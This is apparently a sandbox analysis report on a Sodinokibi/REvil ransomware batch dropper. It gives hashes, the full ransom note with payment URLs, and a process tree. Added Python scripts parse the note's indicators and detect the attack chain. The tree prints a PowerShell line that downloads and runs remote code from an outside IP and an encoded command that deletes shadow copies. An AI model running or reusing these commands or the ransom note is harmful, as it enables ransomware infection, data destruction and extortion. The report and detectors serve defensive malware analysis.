Analysis

  • max time kernel
    138s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    25-03-2020 01:10

General

  • Target

    Dt35j2GH.bat

  • Size

    194B

  • MD5

    1d03256dd605ecc28c8d56afd64e6de1

  • SHA1

    16112901ee26827bf7fe72ce49405556b3b6ed3c

  • SHA256

    c29bb05f17fa7ccd0468b3f9c2ecf1e1f2298cf15b7281c2f9de2396fcedaf4c

  • SHA512

    14f5dbfd28cd36ad309dff3b1714ba35a8e86e749e165860b9cdf0fb966813465eb153041fa34a6dbc4b5b85f69056433372beb52e80f97f3bb766b0da7a6cf5

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • ps1.dropper

    http://185.103.242.78/pastes/Dt35j2GH

Extracted

  • Path

    C:\ozo9948-readme.txt

  • Family

    sodinokibi

  • Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ozo9948. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F0B8CCFF63C65410 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F0B8CCFF63C65410 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: L55LSwNMXroC8Zp89zqP/Pqf2Cnjs0KzpnwpcO3T56A3+EZGXQ0DhryDCw4qi0Rb nXnwQibAJyzXPK/b1GRAfMxaDjyA+kprofecXUOFQSkGJK/3cwnJciy0PIhrASoi Cgdq7RHCfVUbP7vvYB9cc3G7YOi3yxvf+6xjInTbeB0QYu02mv6t4EI+pxZ+/5nY lKheTiQpLxsxvejQqTFErt+y+n49qN2/GPEfdhUXWR9OUJFR+6EgfaVB9LAWZbRy XICgdtcqfwFCbYrPqm1ZxssaoO/kZ4vAgHD6WiZm+vCKT8U+aQHUrrwyCBqcJM7R Lg4UVQt+9DhnDqeHk0O//plvXwR04cC6s902xGcAvpfi9cMZ+WO7Pycl3GlY4tDr 2tDZXqVoe5G5+qZWBY+Edf8h/iifBvotA4iCo8glmxkF8o28bIGySMz5JEbZc5Mx KbTR2CDx+EWFkId8We+n69k0jw2VD6VLizhi0Jc6PC0XVV4u7oZBMv7wbD7yseCt 2Tq3ziQuzbWsZv4J4VULIiaETPeA3rclNIIVDqVpjphxlv9rKiseek6rH2kZziXd bA30Zbbsaoj2G3k6va8KrTwHLtLCXX+RlNVWciOZwYQ1KCAdM4yBcPXoRIy4d5Sd B9JUmBk3CauSLybxKl/9lzD7nK8TA71B/lCgiEwiemQVgDjyviJSeR4IXwnZ+CKN oQlo/2eAuLOd0Qrzq5txOmJJnDHMMuKs7/k923FPUbhUQ1Mo0f6IvdaG42PBZDVE +SdYTsl3VfgMQEdWHrQSMtfdq7jxM1qExDoQ4ehiDyIUSzAV/ASL1jnZco8KReJ5 FirnQtf7KbdfhFsN4mpToRinlr2DOwouwyFa3znf8W6OnyCzeugzfMsm2upvjdE9 k58vhGGj92ZeZW9YX+43d8yI5bVKpBzejhTWjQTZUrRnJA43tzqQex3UiGZ05G+s ZiraeOEY89dE1AkIYWvCDvYLIxfd12HXVxoi4Xo19bnv2bKdMDvh4Znhtch92p7b dzH7xpPuj4B4IHqF6HNoRyj9rKwPMgWBqykWl8oAXcu1ElfnOWoGWebJv1B9hl0e zGBb07PwaRMIA25AivBJCmWcoQJcinvDbnT5A4dKp9Nmv5ZKm2vz2T+Bo9Vfxy9Y L39l+/gRX8XDajeahoIO/4yGCsxMdb/AeM/tDpGVZzq5ZQdkwo7bk4J4BIZs0/g7 mhLtw5qg7NzIze1wqgjfPoFMEOAtifEpxcOonIAGCAqTJT2waFIgBb4rn+KqnbRN Q4hznA3mGDlpO9z4sVfb7OwKPDimBJKmYDf7tXdxfzsYFg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
  • URLs

    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F0B8CCFF63C65410

    http://decryptor.cc/F0B8CCFF63C65410
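The extracted config above is what a responder pivots on: the victim-specific extension, the note filename built from it, the .onion and clearnet contact URLs with their shared path token, and the base64 key blob. The following parser is an added example, not part of the sandbox report or of any Triage tooling. It runs over an abridged copy of this report's note; the key blob in that copy is a short constructed stand-in (not the real key), and the assumption that the note is dropped as `<extension>-readme.txt` is taken from the Path field of this report.

```python
"""IoC extraction from a Sodinokibi/REvil-style ransom note.

Added example, not part of the sandbox report.  NOTE is an abridged copy of
the note in this report; the key blob is a constructed stand-in.
"""
import base64
import re

NOTE = (
    "---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, "
    "and currently unavailable. You can check it: all files on your system has "
    "extension ozo9948. ... a) Download and install TOR browser from this site: "
    "https://torproject.org/ b) Open our website: "
    "http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F0B8CCFF63C65410 "
    "... b) Open our secondary website: http://decryptor.cc/F0B8CCFF63C65410 "
    "... When you open our website, put the following data in the input form: "
    "Key: QUJDREVGR0hJ SktMTU5PUA== "  # constructed stand-in for the real key blob
    "----------------------------------------------------------------------------------------- "
    "!!! DANGER !!! DONT try to change files by yourself ..."
)

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
EXT_RE = re.compile(r"\bextension\s+([A-Za-z0-9]+)")
# The key blob sits between "Key:" and the long dashed separator; the note
# wraps it with whitespace, which is stripped before decoding.
KEY_RE = re.compile(r"Key:\s*(.*?)\s*-{20,}", re.S)
TOKEN_RE = re.compile(r"^[0-9A-F]{16}$")


def parse_revil_note(text: str) -> dict:
    """Return the pivotable fields of one note as a dict."""
    ext = EXT_RE.search(text)
    extension = ext.group(1) if ext else None
    urls = URL_RE.findall(text)
    onion = [u for u in urls if ".onion/" in u]
    # The same per-victim path token is appended to the .onion and clearnet URLs.
    last = lambda u: u.rstrip("/").rsplit("/", 1)[-1]
    tokens = sorted({last(u) for u in urls if TOKEN_RE.match(last(u))})
    key = KEY_RE.search(text)
    key_b64 = "".join(key.group(1).split()) if key else None
    key_len = None
    if key_b64:
        try:
            key_len = len(base64.b64decode(key_b64, validate=True))
        except ValueError:
            key_len = None  # blob is not valid base64; keep the raw text for the record
    return {
        "extension": extension,
        # Assumption taken from this report's Path field (C:\ozo9948-readme.txt).
        "note_filename": f"{extension}-readme.txt" if extension else None,
        "urls": urls,
        "onion_urls": onion,
        "victim_tokens": tokens,
        "key_b64": key_b64,
        "key_bytes": key_len,
    }


if __name__ == "__main__":
    for k, v in parse_revil_note(NOTE).items():
        print(f"{k}: {v}")
```

The extension and note filename give you a host-side hunt (any `*.<ext>` file or `C:\<ext>-readme.txt`), the URLs and token give you the network-side block list, and the decoded key length is a quick sanity check that the blob was captured whole rather than truncated by whatever rendered the note.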

Signatures

  • Drops file in Program Files directory 19 IoCs
  • Drops file in System32 directory 1 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 148 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Dt35j2GH.bat"
    1⤵
    • Discovering connected drives
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Dt35j2GH');Invoke-FKSZQOWEIDH;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Drops file in System32 directory
      • Discovering connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Suspicious use of AdjustPrivilegeToken
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:1872
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1972
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1404
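The process tree above is the whole story of this sample in three command lines: cmd.exe runs the .bat, which launches 32-bit PowerShell to IEX a string fetched from the paste URL, which in turn relaunches PowerShell with an `-e` (EncodedCommand) payload. That payload is base64 of UTF-16LE text and decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, the shadow-copy wipe that precedes encryption (and explains the vssvc.exe activity). The script below is an added example, not part of the sandbox report: it decodes `-e`/`-EncodedCommand` arguments and flags the download cradle, the shadow-copy deletion and the PowerShell-spawns-encoded-PowerShell pattern over constructed process-creation records. The record layout (pid, ppid, image, cmdline) and the parent PID 1000 given to cmd.exe are assumptions; map your own Sysmon or EDR fields onto it.

```python
"""Triage helper for the process chain in this report.

Added example, not part of the sandbox report.  EVENTS is constructed from
the report's process tree plus one benign record; the ppid 1000 is assumed.
"""
import base64
import re
from typing import Optional

# Behaviour signatures, matched against the decoded script when one exists.
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
INVOKE_EXPR = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
SHADOW_DELETE = re.compile(
    r"Win32_ShadowCopy.*\.Delete\(|vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete",
    re.I,
)


def _is_encoded_flag(arg: str) -> bool:
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
    name = arg.lstrip("-/").lower()
    return bool(name) and "encodedcommand".startswith(name)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -e/-EncodedCommand, or None if absent or malformed."""
    argv = cmdline.split()  # the base64 payload never contains whitespace
    for flag, payload in zip(argv, argv[1:]):
        if _is_encoded_flag(flag):
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def classify(cmdline: str):
    """Return (findings, decoded_script) for one command line."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    findings = []
    if decoded is not None:
        findings.append("encoded_command")
    if DOWNLOAD_CRADLE.search(script) and INVOKE_EXPR.search(script):
        findings.append("download_cradle")
    if SHADOW_DELETE.search(script):
        findings.append("shadow_copy_deletion")
    return findings, decoded


def lineage(pid: int, by_pid: dict) -> list:
    """Image basenames from the oldest known ancestor down to pid."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    return names[::-1]


def triage(events: list) -> dict:
    """Map each pid to its ancestry chain, behaviour findings and decoded script."""
    by_pid = {e["pid"]: e for e in events}
    out = {}
    for e in events:
        findings, decoded = classify(e["cmdline"])
        chain = lineage(e["pid"], by_pid)
        # A script host relaunching itself with an encoded command is a cue on its own.
        if chain[-2:] == ["powershell.exe", "powershell.exe"] and decoded is not None:
            findings.append("powershell_spawns_encoded_powershell")
        out[e["pid"]] = {"chain": chain, "findings": findings, "decoded": decoded}
    return out


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed from the report's process tree, plus one benign record
    {"pid": 1848, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\Dt35j2GH.bat"'},
    {"pid": 1872, "ppid": 1848, "image": PS,
     "cmdline": PS + " \"IEX (New-Object System.Net.WebClient).DownloadString("
                "'http://185.103.242.78/pastes/Dt35j2GH');Invoke-FKSZQOWEIDH;Start-Sleep -s 10000\""},
    {"pid": 1972, "ppid": 1872, "image": PS,
     "cmdline": "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="},
    {"pid": 2100, "ppid": 1000, "image": PS,  # benign, constructed
     "cmdline": "powershell -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for pid, r in triage(EVENTS).items():
        print(pid, " > ".join(r["chain"]), r["findings"], repr(r["decoded"]))
```

Matching the signatures against the decoded script rather than the raw command line is the point: the shadow-copy deletion is invisible to a plain string match on the `-e` line, and a rule keyed only on `vssadmin delete shadows` misses this WMI variant entirely.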

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms